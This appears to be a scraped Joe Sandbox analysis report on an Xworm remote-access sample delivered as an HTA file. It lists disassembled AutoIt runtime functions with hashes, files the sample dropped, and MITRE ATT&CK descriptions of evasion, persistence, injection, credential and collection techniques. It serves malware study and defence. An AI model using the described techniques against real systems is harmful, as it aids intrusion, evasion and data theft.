Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 196aff72fee9106aa1fa5eb90e57420cfe28380c130c4f4cec9b6a629a62d403
Instruction ID: 4957d3fea0f4f3aa5b275365b9c7a07c560ea4b61a783f488110b58db88c5a54
Opcode Fuzzy Hash: 196aff72fee9106aa1fa5eb90e57420cfe28380c130c4f4cec9b6a629a62d403
Instruction Fuzzy Hash: 8001B572A52225AF8F14EBA4CD51CFE73B9AF56360B50061AF862573D1DE319C08D660

Function 00AE934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AE9367
__fread_nolock.LIBCMT ref: 00AE937C

Strings

EA06, xrefs: 00AE93AE

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: a4ea8cecd83256c8623b67b32c02df0c29e4871151125457727879bc0c095114
Instruction ID: 4169272f251dffef175ea2f88b0f66b227a55df957a7aecd364ab66f30bb8695
Opcode Fuzzy Hash: a4ea8cecd83256c8623b67b32c02df0c29e4871151125457727879bc0c095114
Instruction Fuzzy Hash: 7C01B972D042587EDB28C7A9C856EBE7BF89B16301F00419EF552D62C1E579A6049760

Function 00AD98B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77

Part of subcall function 00ADB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ADB7BD

SendMessageW.USER32(?,00000180,00000000,?), ref: 00AD9923

Strings

ListBox, xrefs: 00AD98ED
ComboBox, xrefs: 00AD98C2

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 24a1654b42b0167b7e9b924835ae8836b747793dcaf43d1b2d459797f82b3ab5
Instruction ID: 6b19ad6b59de16fc9ed0c7237b01c8095f2a42fda2700a75326c73f23aa4705c
Opcode Fuzzy Hash: 24a1654b42b0167b7e9b924835ae8836b747793dcaf43d1b2d459797f82b3ab5
Instruction Fuzzy Hash: 33018476A92105ABCF14EBA0CA62EFF73EC9F15340F60011AB84263391DE119E0896B1

Function 00AD993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77

Part of subcall function 00ADB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ADB7BD

SendMessageW.USER32(?,00000182,?,00000000), ref: 00AD99A6

Strings

ListBox, xrefs: 00AD9972
ComboBox, xrefs: 00AD9947

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 61472351fd5291e4467a53e9d2e0d43d60006f30889aa6caf2cb96f96cc683d4
Instruction ID: 8a419a67a53a5c0189c1ca10eb092c0187819c34a5918370e45419dd430f2e78
Opcode Fuzzy Hash: 61472351fd5291e4467a53e9d2e0d43d60006f30889aa6caf2cb96f96cc683d4
Instruction Fuzzy Hash: A601A772A42105ABCF14EBA4CA56EFF73FC9F11340F60001AB84663391DE159E089671

Function 00AE54E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00AE5501
_wcscmp.LIBCMT ref: 00AE5513

Strings

#32770, xrefs: 00AE550D

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: a2a1a420b7d694a721df51b8eb8d76d0fce8ef2f953fcbc533c852a95e4192bc
Instruction ID: 00579647d145e96a8c657f7c5f85c44bbbc131ed900762ecfa13e6b01f2cff01
Opcode Fuzzy Hash: a2a1a420b7d694a721df51b8eb8d76d0fce8ef2f953fcbc533c852a95e4192bc
Instruction Fuzzy Hash: 79E0D17790022917D710EB59AC45FABFBECEB55771F000157FD04D7051DA609A4587E0

Function 00AD8892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00AD88A0

Part of subcall function 00AA3588: _doexit.LIBCMT ref: 00AA3592

Strings

AutoIt, xrefs: 00AD8894
Error allocating memory., xrefs: 00AD8899

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 4a75cd0bef98e38f2ce77f0406156d0a84719cd67db780771911420e4628ee7f
Instruction ID: e11f1722949363fbdb474024671718a57092891df59959c498d97e674a0a7ff4
Opcode Fuzzy Hash: 4a75cd0bef98e38f2ce77f0406156d0a84719cd67db780771911420e4628ee7f
Instruction Fuzzy Hash: F7D02B3238031836C22433E86D0BFCA3A888B06B90F10802AFB08661D38ED685D042D5

Function 00ABB4F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00ABB544: _memset.LIBCMT ref: 00ABB551

Part of subcall function 00AA0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00ABB520,?,?,?,00A8100A), ref: 00AA0B79

IsDebuggerPresent.KERNEL32(?,?,?,00A8100A), ref: 00ABB524
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00A8100A), ref: 00ABB533

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00ABB52E

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: c84a4f7806698804d33047d1e8f07f343507d4d1f6cf840835a60e9d9d6749a9
Instruction ID: e1df1ceb6e1433a89597c922871f40940a4c5e6f043e593278714e74eff40441
Opcode Fuzzy Hash: c84a4f7806698804d33047d1e8f07f343507d4d1f6cf840835a60e9d9d6749a9
Instruction Fuzzy Hash: A0E06D702503118FD330AF29E504B827AE4AF04744F108A6DE457C3341DFF5E544CBA2

Function 00AC0251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00AC0091

Part of subcall function 00AFC6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00AC027A,?), ref: 00AFC6E7
Part of subcall function 00AFC6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00AFC6F9

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00AC0289

Strings

WIN_XPe, xrefs: 00AC00A4

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 4075334bb272858fde70f89ab4dead9acdd09456a82c8cc8c3dca98a3751488b
Instruction ID: 0d8a93b157c2d88d768de5fc104f38e31fea317965bb656f77d7834271e51657
Opcode Fuzzy Hash: 4075334bb272858fde70f89ab4dead9acdd09456a82c8cc8c3dca98a3751488b
Instruction Fuzzy Hash: E9F03970804109DFCB15EBA0CA88FECBBB8AB08300F260089E106B31A0CBB04F80DF21

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report c2.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\0756ab74-a3be-443e-a593-13fe6c1b7019.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\9a8118b1-b229-4c53-8444-f00f17537fc6.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF674fff.TMP (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

Windows Analysis Report
c2.hta

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre